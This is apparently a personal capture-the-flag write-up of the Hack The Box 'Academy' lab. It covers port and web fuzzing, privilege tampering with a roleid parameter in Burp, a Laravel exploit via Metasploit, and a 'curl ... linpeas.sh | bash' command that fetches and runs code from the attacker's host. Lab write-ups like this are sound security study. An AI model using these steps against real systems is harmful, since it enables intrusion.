Hack The Box Academy

Hack the Box Academy

sudo nmap -sS -sC -sV -O -A 10.129.60.11

Nothing from gobuster

I tried Nikto scan as well but nothing came back. After googling around I came across some default wfuzz scanning tips so I tried the command below and got back some results

Wfuzz -u http://academy .htb/FUZZ.php -w /usr/share/wordlist/wfuzz/general/common.txt –hc 404,403

After trying all the .php extensions I decided to focus on register.php. You can make account but afterwards there was not much to go off. The site did seem vulnerable to a LFI because I tried a few LFI attacks, but nothing came back

I encountered an error when logging back in with the account I made, so I decided to see what the request looked like through burp suite.

The username and password are in the clear with a roleid=0.

Note: Not sure what roleid is so I googled it.

Once I created a new user I logged back in and caught the request. This time roleid parameter was not present so I pursued this “roleid” even more.

No luck here

Using the login.php with modified admin roleid=2 still takes you to the use dashboard. No luck

Using a new modified user name “admin4” and pass “123” with roleid=1 and combined with using the admin.php extension I was able to login. Burp suite to the rescue!

Dev-stagin-01.academy.htb looks like some sort of follow on link. You can not visit the site by simply placing it in your URL. You need to modify your /etc/hosts to resolve.

O snap!

Recon

Searchsploit Laravel

I came across this blog post and tried following the steps but every time I ran the exploit it failed.

There is an option to set VHOST which will need to be set using “dev-staging-01.academy.htb”

Fired up Metasploit

Recon: Found some users

Unfortunate

After setting up python server I curled linpeas.sh to the box using this command

Curl 10.10.14.113:9797/linpeas.sh | bash

Linpeas didn’t find anything worthy but I had a suspicion that /var/www/html might hold more info. Linepeas did find a lot of referenced usernames in that directory